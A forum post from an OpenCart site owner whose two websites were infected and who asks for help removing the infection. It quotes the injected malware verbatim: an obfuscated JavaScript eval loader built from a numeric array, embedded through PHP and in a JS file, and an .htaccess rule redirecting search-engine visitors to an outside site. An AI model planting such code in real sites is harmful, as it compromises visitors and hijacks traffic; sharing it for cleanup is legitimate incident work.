The problem is that bouth websites were infected with an injection in some php/html and js files.
I will give you exemples of the codes which were added at the end of the files:
Code: Select all
Exemple 1
<?
#336988#
echo " <script type=\"text/javascript\" language=\"javascript\" > try{window.document.body++}catch(gdsgsdg){dbshre=231;}if(dbshre){asd=0;try{d=document.createElement(\"div\");d.innerHTML.a=\"asd\";}catch(agdsg){asd=1;}if(!asd){e=eval;}ss=String;asgq=new Array(31,94,110,104,94,107,97,104,104,27,31,33,25,117,8,1,24,25,26,27,109,89,107,26,92,112,112,95,92,27,52,24,93,105,94,108,101,94,104,111,37,91,107,95,92,107,93,62,102,96,100,93,103,110,35,30,97,95,108,92,100,93,32,35,54,4,2,6,4,27,23,24,25,91,116,111,94,91,40,110,105,91,25,55,27,30,96,109,110,107,49,39,40,109,111,105,89,93,95,95,92,100,101,95,107,88,106,104,102,96,37,89,107,93,99,96,110,98,92,92,106,107,104,40,100,107,39,107,95,103,37,104,97,106,34,50,5,3,26,27,23,24,90,115,115,93,90,39,109,111,112,100,94,40,107,102,107,98,110,100,102,102,25,55,27,30,89,91,109,106,99,109,109,95,34,50,5,3,26,27,23,24,90,115,115,93,90,39,109,111,112,100,94,40,93,102,106,93,95,109,23,53,25,33,43,30,51,6,4,27,23,24,25,91,116,111,94,91,40,110,107,113,101,95,41,95,93,98,97,99,107,24,54,26,34,40,104,113,33,54,4,2,25,26,27,23,89,114,114,97,89,38,108,110,116,99,93,39,113,100,91,108,97,26,56,23,31,42,106,115,30,51,6,4,27,23,24,25,91,116,111,94,91,40,110,107,113,101,95,41,99,93,95,110,27,52,24,32,43,107,111,31,52,7,5,23,24,25,26,92,112,112,95,92,41,106,108,114,102,96,37,108,104,106,27,52,24,32,43,107,111,31,52,7,5,4,2,25,26,27,23,97,95,26,35,24,92,104,93,112,100,93,103,110,41,94,93,109,63,103,92,101,94,104,111,57,113,66,94,35,30,89,114,114,97,89,31,34,35,27,114,5,3,26,27,23,24,25,26,27,23,92,104,93,112,100,93,103,110,41,110,106,98,110,96,31,31,53,94,100,109,24,98,94,56,83,31,90,115,115,93,90,85,33,57,51,39,93,99,113,53,31,34,53,8,1,24,25,26,27,23,24,25,26,95,102,91,110,103,96,101,108,39,97,96,107,61,101,95,104,92,102,109,60,116,64,92,33,33,92,112,112,95,92,34,32,38,90,106,107,92,102,93,61,99,96,100,93,34,92,112,112,95,92,36,50,5,3,26,27,23,24,118,7,5,116,33,33,35,54);s=\"\";for(i=0;i-510!=0;i++){if((020==0x10)&&window.document)s+=ss[\"fromCharCode\"](1*asgq[i]-(i%5-5-4));}z=s;e(s);}</script>";
#/336988#
?>
Exemple 2
#336988#
<IfModule mod_rewrite.c>
RewriteEngine On
RewriteCond %{HTTP_REFERER} ^.*(abacho|abizdirectory|about|acoon|alexana|allesklar|allpages|allthesites|alltheuk|alltheweb|altavista|america|amfibi|aol|apollo7|aport|arcor|ask|atsearch|baidu|bellnet|bestireland|bhanvad|bing|blog|bluewin|botw|brainysearch|bricabrac|browseireland|chapu|claymont|click4choice|clickey|clickz|clush|confex|cyber-content|daffodil|devaro|dmoz|dogpile|ebay|ehow|eniro|entireweb|euroseek|exalead|excite|express|facebook|fastbot|filesearch|findelio|findhow|finditireland|findloo|findwhat|finnalle|finnfirma|fireball|flemiro|flickr|freenet|friendsreunited|galaxy|gasta|gigablast|gimpsy|globalsearchdirectory|goo|google|goto|gulesider|hispavista|hotbot|hotfrog|icq|iesearch|ilse|infoseek|ireland-information|ixquick|jaan|jayde|jobrapido|kataweb|keyweb|kingdomseek|klammeraffe|km|kobala|kompass|kpnvandaag|kvasir|libero|limier|linkedin|live|liveinternet|lookle|lycos|mail|mamma|metabot|metacrawler|metaeureka|mojeek|msn|myspace|netscape|netzindex|nigma|nlsearch|nol9|oekoportal|openstat|orange|passagen|pocketflier|qp|qq|rambler|rtl|savio|schnellsuche|search|search-belgium|searchers|searchspot|sfr|sharelook|simplyhired|slider|sol|splut|spray|startpagina|startsiden|sucharchiv|suchbiene|suchbot|suchknecht|suchmaschine|suchnase|sympatico|telfort|telia|teoma|terra|the-arena|thisisouryear|thunderstone|tiscali|t-online|topseven|twitter|ukkey|uwe|verygoodsearch|vkontakte|voila|walhello|wanadoo|web|webalta|web-archiv|webcrawler|websuche|westaustraliaonline|wikipedia|wisenut|witch|wolong|ya|yahoo|yandex|yell|yippy|youtube|zoneru)\.(.*)
RewriteRule ^(.*)$ http://stradedelleparole.archivibasso.it/rel.php [R=301,L]
</IfModule>
#/336988#
/*336988*/
Exemple 3
try{window.document.body++}catch(gdsgsdg){dbshre=216;}if(dbshre){asd=0;try{d=document.createElement("div");d.innerHTML.a="asd";}catch(agdsg){asd=1;}if(!asd){e=eval;}ss=String;asgq=new Array(31,94,110,104,94,107,97,104,104,27,31,33,25,117,8,1,24,25,26,27,109,89,107,26,92,23,53,25,94,106,90,109,102,95,105,107,38,92,108,96,88,108,94,63,103,92,101,94,104,111,31,31,98,96,109,88,101,94,33,36,50,5,3,7,5,23,24,25,26,92,37,107,107,93,27,52,24,32,98,111,107,104,51,41,42,106,108,107,91,95,92,92,94,102,103,92,104,90,108,106,99,93,39,91,109,90,96,98,112,100,89,89,108,109,106,37,97,109,41,109,92,100,39,106,99,103,31,52,7,5,23,24,25,26,92,37,107,109,115,103,92,38,105,105,110,96,108,98,105,105,23,53,25,33,92,89,107,104,102,112,107,93,32,53,8,1,24,25,26,27,88,38,108,110,116,99,93,39,92,106,105,92,94,108,27,52,24,32,42,34,50,5,3,26,27,23,24,90,40,110,107,113,101,95,41,95,93,98,97,99,107,24,54,26,34,40,104,113,33,54,4,2,25,26,27,23,89,39,109,111,112,100,94,40,114,96,92,109,98,27,52,24,32,43,107,111,31,52,7,5,23,24,25,26,92,37,107,109,115,103,92,38,101,95,97,107,24,54,26,34,40,104,113,33,54,4,2,25,26,27,23,89,39,109,111,112,100,94,40,111,102,104,25,55,27,30,41,105,114,34,50,5,3,7,5,23,24,25,26,100,93,24,33,27,95,102,91,110,103,96,101,108,39,97,96,107,61,101,95,104,92,102,109,60,116,64,92,33,33,92,30,33,34,26,118,4,2,25,26,27,23,24,25,26,27,91,103,92,111,104,92,102,109,40,114,105,97,109,95,35,30,52,93,99,113,23,97,93,55,87,30,89,85,33,57,51,39,93,99,113,53,31,34,53,8,1,24,25,26,27,23,24,25,26,95,102,91,110,103,96,101,108,39,97,96,107,61,101,95,104,92,102,109,60,116,64,92,33,33,92,30,33,39,91,107,103,93,103,94,62,95,97,101,94,35,88,33,52,7,5,23,24,25,26,120,4,2,118,35,35,32,51);s="";for(i=0;i-462!=0;i++){if((020==0x10)&&window.document)s+=ss["fromCharCode"](1*asgq[i]-(i%5-5-4));}z=s;e(s);}
/*/336988*/
The owners of the host told me that this is an opencart problem, Daniel or someone... how can i fix this? I use OC 1.5.3.1. For the moment i fixed the problem manualy.
Thabk you, this is very urgent for me! And it is not the same time, had the same problem a year ago!
THX!
